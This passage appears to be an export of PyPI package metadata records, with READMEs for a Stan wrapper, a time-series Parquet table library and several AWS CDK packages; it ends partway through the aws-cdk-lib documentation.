<a href="https://www.islas.org.mx/"><img src="https://www.islas.org.mx/img/logo.svg" align="right" width="256" /></a> # Eradication Stan [![codecov](https://codecov.io/gh/IslasGECI/eradication_stan/graph/badge.svg?token=RY807ST1T1)](https://codecov.io/gh/IslasGECI/eradication_stan) ![example branch parameter](https://github.com/IslasGECI/eradication_stan/actions/workflows/actions.yml/badge.svg) ![licencia](https://img.shields.io/github/license/IslasGECI/eradication_stan) ![languages](https://img.shields.io/github/languages/top/IslasGECI/eradication_stan) ![commits](https://img.shields.io/github/commit-activity/y/IslasGECI/eradication_stan) ![PyPI - Version](https://img.shields.io/pypi/v/eradication_stan) Python wrapper used for bayesian inference for eradication proyects. 🐍 This is a wrapper for [Stan software](https://mc-stan.org/) used for cat eradication project.
text/markdown
Ciencia de Datos • GECI
ciencia.datos@islas.org.mx
null
null
null
null
[ "License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)" ]
[]
https://github.com/IslasGECI/eradication_stan
null
>=3.9
[]
[]
[]
[ "fastapi", "httpx", "pandas", "python-multipart", "pandas-stubs; extra == \"dev\"", "geci-test-tools; extra == \"dev\"" ]
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T21:59:05.513318
eradication_stan-0.2.0.tar.gz
14,054
fc/69/ff9ec7200c10d9ccea9762465d11a14196580eaa862732fc53ace38c6036/eradication_stan-0.2.0.tar.gz
source
sdist
null
false
84ee28fb1949d938c144ef6bcc9ad0d0
31d4fca17bd081293169ef857fae3f7488ef1c249cfaa4fc95331dce78249bd1
fc69ff9ec7200c10d9ccea9762465d11a14196580eaa862732fc53ace38c6036
null
[ "LICENSE" ]
221
2.4
timeseries-table-format
0.1.3
Append-only time-series table format with gap/overlap tracking (Python bindings).
# timeseries-table-format (Python) Python-first workflow for managing local, append-only time-series tables stored as Parquet segments on disk, with SQL querying (DataFusion) that returns `pyarrow.Table`. - PyPI: `timeseries-table-format` - Import: `timeseries_table_format` - Docs: https://mag1cfrog.github.io/timeseries-table-format/ v0 is local-filesystem-only (no S3/object storage backend yet). ## Install ```bash pip install timeseries-table-format ``` Requires: Python 3.10+. `pyarrow` is installed automatically (dependency: `pyarrow>=23.0.0`). If `pip` tries to build from source (Rust errors), see Troubleshooting below. ## Verify installation ```python import timeseries_table_format as ttf out = ttf.Session().sql("select 1 as x") print(type(out)) # pyarrow.Table ``` ## Return type and interop `Session.sql(...)` returns a `pyarrow.Table`. - Polars: `pip install polars`, then `polars.from_arrow(out)` ## Notebook display (Jupyter/IPython) In IPython/Jupyter (including VS Code notebooks), `pyarrow.Table` results will display as a bounded HTML preview by default (the return type is still a real `pyarrow.Table`). - Defaults: `max_rows=20` (head/tail), `max_cols=50` (left/right), `max_cell_chars=2000` - Opt-out: set `TTF_NOTEBOOK_DISPLAY=0` before importing `timeseries_table_format`, or call `timeseries_table_format.disable_notebook_display()` - Configure: call `timeseries_table_format.enable_notebook_display(max_rows=..., max_cols=..., max_cell_chars=..., align=...)` - Config file (TOML): set `TTF_NOTEBOOK_CONFIG=path/to/ttf.toml` before importing `timeseries_table_format` (or call `timeseries_table_format.load_notebook_display_config("path/to/ttf.toml")`) (On Python 3.10, install `tomli` to enable TOML parsing.) - Alignment: `align="right"` (default) or `align="auto"` (strings left, numbers right); auto-enable can be configured with `TTF_NOTEBOOK_ALIGN=auto|left|right` - Cells are visually clipped to a bounded column width with an ellipsis indicator; copying a cell copies the underlying value (up to `max_cell_chars`). Example `ttf.toml`: ```toml [notebook_display] max_rows = 20 max_cols = 50 max_cell_chars = 2000 align = "auto" ``` ## Maintainers: releasing the Python package The PyPI package version is derived from `crates/timeseries-table-python/Cargo.toml` (via maturin). If you change the pure-Python sources under `python/src/` (or `python/pyproject.toml` / `python/README.md`), CI will automatically update `crates/timeseries-table-python/python-src.stamp` on PRs from branches in this repository. If you need to update it locally (e.g. working on a fork, or before pushing), run: ```bash python3 scripts/update_python_wheel_stamp.py ``` If your development environment uses the repo venv, you can also run: ```bash python/.venv/bin/python scripts/update_python_wheel_stamp.py ``` CI enforces the stamp, and it helps the release automation notice python-only changes for version bumps. ## Quickstart: create → append → query ```python import tempfile from pathlib import Path import pyarrow as pa import pyarrow.parquet as pq import timeseries_table_format as ttf with tempfile.TemporaryDirectory() as d: table_root = Path(d) / "my_table" tbl = ttf.TimeSeriesTable.create( table_root=str(table_root), time_column="ts", bucket="1h", entity_columns=["symbol"], timezone=None, ) seg_path = table_root / "incoming" / "prices.parquet" seg_path.parent.mkdir(parents=True, exist_ok=True) pq.write_table( pa.table( { "ts": pa.array([0, 3_600 * 1_000_000, 7_200 * 1_000_000], type=pa.timestamp("us")), "symbol": pa.array(["NVDA", "NVDA", "NVDA"], type=pa.string()), "close": pa.array([10.0, 20.0, 30.0], type=pa.float64()), } ), str(seg_path), ) tbl.append_parquet(str(seg_path)) sess = ttf.Session() sess.register_tstable("prices", str(table_root)) out = sess.sql("select ts, symbol, close from prices order by ts") print(out) # pyarrow.Table ``` > **Bucket size (important):** `bucket=1h` does **not** resample your data. It defines the time grid used for overlap detection and coverage tracking. > Example: with `bucket=1h`, timestamps `10:05` and `10:55` fall into the same bucket (10:00–11:00). > See https://mag1cfrog.github.io/timeseries-table-format/concepts/bucketing_and_overlap/ ## Join multiple tables ```python # Aligned with python/examples/register_and_join_two_tables.py import tempfile from pathlib import Path import pyarrow as pa import pyarrow.parquet as pq import timeseries_table_format as ttf with tempfile.TemporaryDirectory() as d: base_dir = Path(d) prices_root = base_dir / "prices_tbl" prices = ttf.TimeSeriesTable.create( table_root=str(prices_root), time_column="ts", bucket="1h", entity_columns=["symbol"], timezone=None, ) prices_seg = base_dir / "prices.parquet" pq.write_table( pa.table( { "ts": pa.array([0, 3_600 * 1_000_000], type=pa.timestamp("us")), "symbol": pa.array(["NVDA", "NVDA"], type=pa.string()), "close": pa.array([1.0, 2.0], type=pa.float64()), } ), str(prices_seg), ) prices.append_parquet(str(prices_seg)) volumes_root = base_dir / "volumes_tbl" volumes = ttf.TimeSeriesTable.create( table_root=str(volumes_root), time_column="ts", bucket="1h", entity_columns=["symbol"], timezone=None, ) volumes_seg = base_dir / "volumes.parquet" pq.write_table( pa.table( { "ts": pa.array([0, 3_600 * 1_000_000], type=pa.timestamp("us")), "symbol": pa.array(["NVDA", "NVDA"], type=pa.string()), "volume": pa.array([10, 20], type=pa.int64()), } ), str(volumes_seg), ) volumes.append_parquet(str(volumes_seg)) sess = ttf.Session() sess.register_tstable("prices", str(prices_root)) sess.register_tstable("volumes", str(volumes_root)) out = sess.sql( """ select p.ts as ts, p.symbol as symbol, p.close as close, v.volume as volume from prices p join volumes v on p.ts = v.ts and p.symbol = v.symbol order by p.ts """ ) print(out) # pyarrow.Table ``` ## Parameterized queries DataFusion infers placeholder types from context when possible (e.g. in `WHERE` clauses). If you use placeholders in a `SELECT` projection without type context, you may need an explicit cast. ```python # Aligned with python/examples/parameterized_queries.py import timeseries_table_format as ttf sess = ttf.Session() out_positional = sess.sql( "select cast($1 as bigint) as x, cast($2 as varchar) as y", params=[1, "hello"], ) out_named = sess.sql( "select cast($a as bigint) as x, cast($b as varchar) as y", params={"a": 2, "b": "world"}, ) print(out_positional) print(out_named) ``` ## Building from source (contributors) Prereqs: - Rust toolchain installed - Python 3.10+ (CI targets 3.10–3.14; examples below use 3.12) - `uv` installed From the repo root: ```bash uv venv -p 3.12 python/.venv uv pip install -p python/.venv/bin/python -e python --group dev python/.venv/bin/python -m pytest ``` Type checking (ty): ```bash uvx ty check --project python ``` Alternative (uses the `python/` dev environment): ```bash cd python uv run ty check ``` Alternative: build with `maturin` directly: ```bash cd python uv venv -p 3.12 .venv uv pip install -p .venv/bin/python pyarrow --group dev uv run -p .venv/bin/python maturin develop .venv/bin/python -m pytest ``` ## Benchmark: SQL conversion (IPC vs C Stream) `Session.sql(...)` returns results as a `pyarrow.Table`. By default, results are exported via the Arrow C Data Interface (C Stream) when supported, and fall back to an in-memory Arrow IPC stream otherwise. To compare the two paths and estimate the conversion overhead, run: ```bash cd python uv pip install -p .venv/bin/python numpy uv run -p .venv/bin/python maturin develop --features test-utils .venv/bin/python bench/sql_conversion.py --target-ipc-gb 2 ``` Environment variables (useful for debugging and benchmarks): - `TTF_SQL_EXPORT_MODE=auto|ipc|c_stream` (default: `c_stream`) - `TTF_SQL_EXPORT_DEBUG=1` to emit a debug warning when `auto` falls back from C Stream → IPC - `TTF_SQL_EXPORT_AUTO_RERUN_FALLBACK=1` to re-run the SQL query on C Stream failure in `auto` mode (avoids cloning batches on the hot path, but may change results for non-deterministic queries) Optional: benchmark IPC ZSTD compression (requires building with `ipc-zstd`): ```bash uv run -p .venv/bin/python maturin develop --features test-utils,ipc-zstd .venv/bin/python bench/sql_conversion.py --target-ipc-gb 2 --ipc-compression zstd ``` The script can print a human-friendly terminal summary (`--summary`) and/or write a JSON payload to a file (`--json path`). It reports separate timings for: - end-to-end `Session.sql(...)` - Rust-side query+IPC encode (`_native._testing._bench_sql_ipc`) - Rust-side query+C Stream export (`_native._testing._bench_sql_c_stream`) - Python-side decode/import Large targets can require high peak RAM (IPC bytes + decoded Table + intermediate buffers). Start with `--target-ipc-gb 2` and scale up to `3` or `6` on a machine with plenty of memory. If you hit `Disk quota exceeded`, pass `--tmpdir /path/with/more/space` (the bench uses a temporary directory and cleans it up on exit). ## Troubleshooting - `pip` is building from source / fails with Rust errors: no wheel is available for your platform/Python; install Rust and retry, or use a supported Python/platform combination. - `DataFusionError` about an unknown table name: call `sess.register_tstable("name", "/path/to/table")` first; use `sess.tables()` to list registrations. - Append fails with a time column error: the timestamp column must be an Arrow `timestamp(...)`, and the unit should remain consistent across segments (e.g. `timestamp("us")`). - `SchemaMismatchError` on append: the new Parquet segment schema must match the table's adopted schema (column names and types). - SQL errors / parameter placeholders: try an explicit `CAST(...)` for placeholders used in `SELECT` projections.
text/markdown; charset=UTF-8; variant=GFM
null
null
null
null
null
null
[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Programming Language :: Python :: 3.14" ]
[]
null
null
>=3.10
[]
[]
[]
[ "pyarrow>=23.0.0" ]
[]
[]
[]
[ "Changelog, https://github.com/mag1cfrog/timeseries-table-format/blob/main/crates/timeseries-table-python/CHANGELOG.md", "Documentation, https://mag1cfrog.github.io/timeseries-table-format/", "Issues, https://github.com/mag1cfrog/timeseries-table-format/issues", "Repository, https://github.com/mag1cfrog/times...
twine/6.1.0 CPython/3.13.7
2026-02-19T21:58:34.844525
timeseries_table_format-0.1.3.tar.gz
240,202
91/cd/441867278c27afb60b46cc4389b613968b65d4c01e7761f0746e891d8e98/timeseries_table_format-0.1.3.tar.gz
source
sdist
null
false
75b71d75fc46b94a3bdd5f4cdf097816
ceb8a26da9028f7f6072318725943abdd3c1c751d0ff3a6c2bbf044a4e7a9d77
91cd441867278c27afb60b46cc4389b613968b65d4c01e7761f0746e891d8e98
null
[]
1,013
2.1
aws-cdk.region-info
2.239.0
AWS region information, such as service principal names
# AWS Region-Specific Information Directory ## Usage Some information used in CDK Applications differs from one AWS region to another, such as service principals used in IAM policies, S3 static website endpoints, ... ### The `RegionInfo` class The library offers a simple interface to obtain region specific information in the form of the `RegionInfo` class. This is the preferred way to interact with the regional information database: ```python # Get the information for "eu-west-1": region = region_info.RegionInfo.get("eu-west-1") # Access attributes: region.s3_static_website_endpoint ``` The `RegionInfo` layer is built on top of the Low-Level API, which is described below and can be used to register additional data, including user-defined facts that are not available through the `RegionInfo` interface. ### Low-Level API This library offers a primitive database of such information so that CDK constructs can easily access regional information. The `FactName` class provides a list of known fact names, which can then be used with the `RegionInfo` to retrieve a particular value: ```python static_website = region_info.Fact.find("ap-northeast-1", region_info.FactName.S3_STATIC_WEBSITE_ENDPOINT) ``` ## Supplying new or missing information As new regions are released, it might happen that a particular fact you need is missing from the library. In such cases, the `Fact.register` method can be used to inject FactName into the database: ```python @jsii.implements(region_info.IFact) class MyFact: region_info.Fact.register(MyFact()) ``` ## Overriding incorrect information In the event information provided by the library is incorrect, it can be overridden using the same `Fact.register` method demonstrated above, simply adding an extra boolean argument: ```python @jsii.implements(region_info.IFact) class MyFact: region_info.Fact.register(MyFact(), True) ``` If you happen to have stumbled upon incorrect data built into this library, it is always a good idea to report your findings in a [GitHub issue](https://github.com/aws/aws-cdk/issues), so we can fix it for everyone else! --- This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project.
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:31.197278
aws_cdk_region_info-2.239.0.tar.gz
308,025
ee/e4/1f7bc1ae29e9bf76c4d6bf2f8ae0f94736c88046d3b9a693137fc557961d/aws_cdk_region_info-2.239.0.tar.gz
source
sdist
null
false
6df35d8ed75d3c37f16c8b44a3d2d749
228b097b2eaa77c3c647478134e163e4983b73fa903a347dbc737465cf9afd40
eee41f7bc1ae29e9bf76c4d6bf2f8ae0f94736c88046d3b9a693137fc557961d
null
[]
0
2.1
aws-cdk.mixins-preview
2.239.0a0
Preview of CDK Mixins - composable, reusable abstractions that can be applied to any construct (L1, L2 or custom).
# CDK Mixins (Preview) <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This package provides two main features: 1. **Mixins** - Composable abstractions for adding functionality to constructs 2. **EventBridge Event Patterns** - Type-safe event patterns for AWS resources --- ## CDK Mixins CDK Mixins provide a new, advanced way to add functionality through composable abstractions. Unlike traditional L2 constructs that bundle all features together, Mixins allow you to pick and choose exactly the capabilities you need for constructs. ### Key Benefits * **Universal Compatibility**: Apply the same abstractions to L1 constructs, L2 constructs, or custom constructs * **Composable Design**: Mix and match features without being locked into specific implementations * **Cross-Service Abstractions**: Use common patterns like encryption across different AWS services * **Escape Hatch Freedom**: Customize resources in a safe, typed way while keeping the abstractions you want ### Basic Usage Mixins use `Mixins.of()` as the fundamental API for applying abstractions to constructs: ```python # Base form: apply mixins to any construct bucket = s3.CfnBucket(scope, "MyBucket") Mixins.of(bucket).apply(EncryptionAtRest()).apply(AutoDeleteObjects()) ``` #### Fluent Syntax with `.with()` For convenience, you can use the `.with()` method for a more fluent syntax: ```python from aws_cdk.mixins_preview.with import bucket = s3.CfnBucket(scope, "MyBucket").with(BucketVersioning()).with(AutoDeleteObjects()) ``` The `.with()` method is available after importing `@aws-cdk/mixins-preview/with`, which augments all constructs with this method. It provides the same functionality as `Mixins.of().apply()` but with a more chainable API. > **Note**: The `.with()` fluent syntax is only available in JavaScript and TypeScript. Other jsii languages (Python, Java, C#, and Go) should use the `Mixins.of(...).requireAll()` syntax instead. The import requirement is temporary during the preview phase. Once the API is stable, the `.with()` method will be available by default on all constructs and in all languages. ### Creating Custom Mixins Mixins are simple classes that implement the `IMixin` interface (usually by extending the abstract `Mixin` class: ```python # Simple mixin that enables versioning @jsii.implements(IMixin) class CustomVersioningMixin(Mixin): def supports(self, construct): return construct instanceof s3.CfnBucket def apply_to(self, bucket): bucket.versioning_configuration = { "status": "Enabled" } # Usage bucket = s3.CfnBucket(scope, "MyBucket") Mixins.of(bucket).apply(CustomVersioningMixin()) ``` ### Construct Selection Mixins operate on construct trees and can be applied selectively: ```python # Apply to all constructs in a scope Mixins.of(scope).apply(EncryptionAtRest()) # Apply to specific resource types Mixins.of(scope, ConstructSelector.resources_of_type(s3.CfnBucket.CFN_RESOURCE_TYPE_NAME)).apply(EncryptionAtRest()) # Apply to constructs matching a path pattern Mixins.of(scope, ConstructSelector.by_path("**/*-prod-*/**")).apply(ProductionSecurityMixin()) ``` ### Built-in Mixins #### Cross-Service Mixins **EncryptionAtRest**: Applies encryption to supported AWS resources ```python # Works across different resource types bucket = s3.CfnBucket(scope, "Bucket") Mixins.of(bucket).apply(EncryptionAtRest()) log_group = logs.CfnLogGroup(scope, "LogGroup") Mixins.of(log_group).apply(EncryptionAtRest()) ``` #### S3-Specific Mixins **AutoDeleteObjects**: Configures automatic object deletion for S3 buckets ```python bucket = s3.CfnBucket(scope, "Bucket") Mixins.of(bucket).apply(AutoDeleteObjects()) ``` **BucketVersioning**: Enables versioning on S3 buckets ```python bucket = s3.CfnBucket(scope, "Bucket") Mixins.of(bucket).apply(BucketVersioning()) ``` **BucketBlockPublicAccess**: Enables blocking public-access on S3 buckets ```python bucket = s3.CfnBucket(scope, "Bucket") Mixins.of(bucket).apply(BucketBlockPublicAccess()) ``` **BucketPolicyStatementsMixin**: Adds IAM policy statements to a bucket policy ```python # bucket: s3.IBucketRef bucket_policy = s3.CfnBucketPolicy(scope, "BucketPolicy", bucket=bucket, policy_document=iam.PolicyDocument() ) Mixins.of(bucket_policy).apply(BucketPolicyStatementsMixin([ iam.PolicyStatement( actions=["s3:GetObject"], resources=["*"], principals=[iam.AnyPrincipal()] ) ])) ``` #### ECS-Specific Mixins **ClusterSettings**: Applies one or more cluster settings to ECS clusters ```python import aws_cdk.aws_ecs as ecs from aws_cdk.mixins_preview.aws_ecs.mixins import ClusterSettings cluster = ecs.CfnCluster(scope, "Cluster") Mixins.of(cluster).apply(ClusterSettings([ name="containerInsights", value="enhanced" ])) ``` ### Logs Delivery Configures vended logs delivery for supported resources to various destinations: ```python from aws_cdk.mixins_preview.with import import aws_cdk.mixins_preview.aws_cloudfront.mixins as cloudfront_mixins # Create CloudFront distribution # bucket: s3.Bucket distribution = cloudfront.Distribution(scope, "Distribution", default_behavior=cloudfront.BehaviorOptions( origin=origins.S3BucketOrigin.with_origin_access_control(bucket) ) ) # Create log destination log_group = logs.LogGroup(scope, "DeliveryLogGroup") # Configure log delivery using the mixin distribution.with(cloudfront_mixins.CfnDistributionLogsMixin.CONNECTION_LOGS.to_log_group(log_group)) ``` Configures vended logs delivery for supported resources when a pre-created destination is provided: ```python from aws_cdk.mixins_preview.with import import aws_cdk.mixins_preview.aws_cloudfront.mixins as cloudfront_mixins # Create CloudFront distribution # bucket: s3.Bucket distribution = cloudfront.Distribution(scope, "Distribution", default_behavior=cloudfront.BehaviorOptions( origin=origins.S3BucketOrigin.with_origin_access_control(bucket) ) ) # Create destination bucket dest_bucket = s3.Bucket(scope, "DeliveryBucket") # Add permissions to bucket to facilitate log delivery bucket_policy = s3.BucketPolicy(scope, "DeliveryBucketPolicy", bucket=dest_bucket, document=iam.PolicyDocument() ) # Create S3 delivery destination for logs destination = logs.CfnDeliveryDestination(scope, "Destination", destination_resource_arn=dest_bucket.bucket_arn, name="unique-destination-name", delivery_destination_type="S3" ) distribution.with(cloudfront_mixins.CfnDistributionLogsMixin.CONNECTION_LOGS.to_destination(destination)) ``` ### L1 Property Mixins For every CloudFormation resource, CDK Mixins automatically generates type-safe property mixins. These allow you to apply L1 properties with full TypeScript support: ```python from aws_cdk.mixins_preview.with import bucket = s3.Bucket(scope, "Bucket").with(CfnBucketPropsMixin( versioning_configuration=CfnBucketPropsMixin.VersioningConfigurationProperty(status="Enabled"), public_access_block_configuration=CfnBucketPropsMixin.PublicAccessBlockConfigurationProperty( block_public_acls=True, block_public_policy=True ) )) ``` Property mixins support two merge strategies: ```python from aws_cdk.mixins_preview.aws_s3.mixins import CfnBucketMixinProps, CfnBucketMixinProps # bucket: s3.CfnBucket # MERGE (default): Deep merges properties with existing values Mixins.of(bucket).apply(CfnBucketPropsMixin(CfnBucketMixinProps(versioning_configuration=CfnBucketPropsMixin.VersioningConfigurationProperty(status="Enabled")), strategy=PropertyMergeStrategy.MERGE)) # OVERRIDE: Replaces existing property values Mixins.of(bucket).apply(CfnBucketPropsMixin(CfnBucketMixinProps(versioning_configuration=CfnBucketPropsMixin.VersioningConfigurationProperty(status="Enabled")), strategy=PropertyMergeStrategy.OVERRIDE)) ``` Property mixins are available for all AWS services: ```python from aws_cdk.mixins_preview.aws_logs.mixins import CfnLogGroupPropsMixin from aws_cdk.mixins_preview.aws_lambda.mixins import CfnFunctionPropsMixin from aws_cdk.mixins_preview.aws_dynamodb.mixins import CfnTablePropsMixin ``` ### Error Handling Mixins provide comprehensive error handling: ```python # Graceful handling of unsupported constructs Mixins.of(scope).apply(EncryptionAtRest()) # Skips unsupported constructs # Strict application that requires all constructs to match Mixins.of(scope).require_all().apply(EncryptionAtRest()) ``` --- ## EventBridge Event Patterns CDK Mixins automatically generates typed EventBridge event patterns for AWS resources. These patterns work with both L1 and L2 constructs, providing a consistent interface for creating EventBridge rules. ### Event Patterns Basic Usage ```python from aws_cdk.mixins_preview.aws_s3.events import BucketEvents import aws_cdk.aws_events as events import aws_cdk.aws_events_targets as targets # fn: lambda.Function # Works with L2 constructs bucket = s3.Bucket(scope, "Bucket") bucket_events = BucketEvents.from_bucket(bucket) events.Rule(scope, "Rule", event_pattern=bucket_events.object_created_pattern( object=BucketEvents.ObjectCreated.ObjectType(key=events.Match.wildcard("uploads/*")) ), targets=[targets.LambdaFunction(fn)] ) # Also works with L1 constructs cfn_bucket = s3.CfnBucket(scope, "CfnBucket") cfn_bucket_events = BucketEvents.from_bucket(cfn_bucket) events.CfnRule(scope, "CfnRule", state="ENABLED", event_pattern=cfn_bucket_events.object_created_pattern( object=BucketEvents.ObjectCreated.ObjectType(key=events.Match.wildcard("uploads/*")) ), targets=[events.CfnRule.TargetProperty(arn=fn.function_arn, id="L1")] ) ``` ### Event Pattern Features **Automatic Resource Injection**: Resource identifiers are automatically included in patterns ```python from aws_cdk.mixins_preview.aws_s3.events import BucketEvents # bucket: s3.Bucket bucket_events = BucketEvents.from_bucket(bucket) # Bucket name is automatically injected from the bucket reference pattern = bucket_events.object_created_pattern() ``` **Event Metadata Support**: Control EventBridge pattern metadata ```python from aws_cdk import AWSEventMetadataProps from aws_cdk.mixins_preview.aws_s3.events import BucketEvents import aws_cdk.aws_events as events # bucket: s3.Bucket bucket_events = BucketEvents.from_bucket(bucket) pattern = bucket_events.object_created_pattern( event_metadata=AWSEventMetadataProps( region=events.Match.prefix("us-"), version=["0"] ) ) ``` ### Available Events Event patterns are generated for EventBridge events available in the AWS Event Schema Registry. Common examples: **S3 Events**: * `objectCreatedPattern()` - Object creation events * `objectDeletedPattern()` - Object deletion events * `objectTagsAddedPattern()` - Object tagging events * `awsAPICallViaCloudTrailPattern()` - CloudTrail API calls Import events from service-specific modules: ```python from aws_cdk.mixins_preview.aws_s3.events import BucketEvents ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:29.009151
aws_cdk_mixins_preview-2.239.0a0.tar.gz
24,050,993
24/e1/9f8297b81c3065c756a5c8ec5007b523aa08cc198b32a0a01dddbb1bb26b/aws_cdk_mixins_preview-2.239.0a0.tar.gz
source
sdist
null
false
99c7cf82c485c1a13285f13640163d08
5e41fbcbde53709db04f7ad8c14576c9fe7ac327facc62cf3b414841537f2be9
24e19f8297b81c3065c756a5c8ec5007b523aa08cc198b32a0a01dddbb1bb26b
null
[]
0
2.1
aws-cdk-lib
2.239.0
Version 2 of the AWS Cloud Development Kit library
# AWS Cloud Development Kit Library The AWS CDK construct library provides APIs to define your CDK application and add CDK constructs to the application. ## Usage ### Upgrade from CDK 1.x When upgrading from CDK 1.x, remove all dependencies to individual CDK packages from your dependencies file and follow the rest of the sections. ### Installation To use this package, you need to declare this package and the `constructs` package as dependencies. According to the kind of project you are developing: For projects that are CDK libraries in NPM, declare them both under the `devDependencies` **and** `peerDependencies` sections. To make sure your library is compatible with the widest range of CDK versions: pick the minimum `aws-cdk-lib` version that your library requires; declare a range dependency with a caret on that version in peerDependencies, and declare a point version dependency on that version in devDependencies. For example, let's say the minimum version your library needs is `2.38.0`. Your `package.json` should look like this: ```javascript { "peerDependencies": { "aws-cdk-lib": "^2.38.0", "constructs": "^10.5.0" }, "devDependencies": { /* Install the oldest version for testing so we don't accidentally use features from a newer version than we declare */ "aws-cdk-lib": "2.38.0" } } ``` For CDK apps, declare them under the `dependencies` section. Use a caret so you always get the latest version: ```json { "dependencies": { "aws-cdk-lib": "^2.38.0", "constructs": "^10.5.0" } } ``` ### Use in your code #### Classic import You can use a classic import to get access to each service namespaces: ```python from aws_cdk import Stack, App, aws_s3 as s3 app = App() stack = Stack(app, "TestStack") s3.Bucket(stack, "TestBucket") ``` #### Barrel import Alternatively, you can use "barrel" imports: ```python from aws_cdk import App, Stack from aws_cdk.aws_s3 import Bucket app = App() stack = Stack(app, "TestStack") Bucket(stack, "TestBucket") ``` <!--BEGIN CORE DOCUMENTATION--> ## Stacks and Stages A `Stack` is the smallest physical unit of deployment, and maps directly onto a CloudFormation Stack. You define a Stack by defining a subclass of `Stack` -- let's call it `MyStack` -- and instantiating the constructs that make up your application in `MyStack`'s constructor. You then instantiate this stack one or more times to define different instances of your application. For example, you can instantiate it once using few and cheap EC2 instances for testing, and once again using more and bigger EC2 instances for production. When your application grows, you may decide that it makes more sense to split it out across multiple `Stack` classes. This can happen for a number of reasons: * You could be starting to reach the maximum number of resources allowed in a single stack (this is currently 500). * You could decide you want to separate out stateful resources and stateless resources into separate stacks, so that it becomes easy to tear down and recreate the stacks that don't have stateful resources. * There could be a single stack with resources (like a VPC) that are shared between multiple instances of other stacks containing your applications. As soon as your conceptual application starts to encompass multiple stacks, it is convenient to wrap them in another construct that represents your logical application. You can then treat that new unit the same way you used to be able to treat a single stack: by instantiating it multiple times for different instances of your application. You can define a custom subclass of `Stage`, holding one or more `Stack`s, to represent a single logical instance of your application. As a final note: `Stack`s are not a unit of reuse. They describe physical deployment layouts, and as such are best left to application builders to organize their deployments with. If you want to vend a reusable construct, define it as a subclasses of `Construct`: the consumers of your construct will decide where to place it in their own stacks. ## Stack Synthesizers Each Stack has a *synthesizer*, an object that determines how and where the Stack should be synthesized and deployed. The synthesizer controls aspects like: * How does the stack reference assets? (Either through CloudFormation parameters the CLI supplies, or because the Stack knows a predefined location where assets will be uploaded). * What roles are used to deploy the stack? These can be bootstrapped roles, roles created in some other way, or just the CLI's current credentials. The following synthesizers are available: * `DefaultStackSynthesizer`: recommended. Uses predefined asset locations and roles created by the modern bootstrap template. Access control is done by controlling who can assume the deploy role. This is the default stack synthesizer in CDKv2. * `LegacyStackSynthesizer`: Uses CloudFormation parameters to communicate asset locations, and the CLI's current permissions to deploy stacks. This is the default stack synthesizer in CDKv1. * `CliCredentialsStackSynthesizer`: Uses predefined asset locations, and the CLI's current permissions. Each of these synthesizers takes configuration arguments. To configure a stack with a synthesizer, pass it as one of its properties: ```python MyStack(app, "MyStack", synthesizer=DefaultStackSynthesizer( file_assets_bucket_name="amzn-s3-demo-bucket" ) ) ``` For more information on bootstrapping accounts and customizing synthesis, see [Bootstrapping in the CDK Developer Guide](https://docs.aws.amazon.com/cdk/latest/guide/bootstrapping.html). ### STS Role Options You can configure STS options that instruct the CDK CLI on which configuration should it use when assuming the various roles that are involved in a deployment operation. Refer to [the bootstrapping guide](https://docs.aws.amazon.com/cdk/v2/guide/bootstrapping-env.html#bootstrapping-env-roles) for further context. These options are available via the `DefaultStackSynthesizer` properties: ```python class MyStack(Stack): def __init__(self, scope, id, *, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None): super().__init__(scope, id, (SpreadAssignment ...props description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors), synthesizer=DefaultStackSynthesizer( deploy_role_external_id="", deploy_role_additional_options={}, file_asset_publishing_external_id="", file_asset_publishing_role_additional_options={}, image_asset_publishing_external_id="", image_asset_publishing_role_additional_options={}, lookup_role_external_id="", lookup_role_additional_options={} ) ) ``` > Note that the `*additionalOptions` property does not allow passing `ExternalId` or `RoleArn`, as these options > have dedicated properties that configure them. #### Session Tags STS session tags are used to implement [Attribute-Based Access Control](https://docs.aws.amazon.com/IAM/latest/UserGuide/introduction_attribute-based-access-control.html) (ABAC). See [IAM tutorial: Define permissions to access AWS resources based on 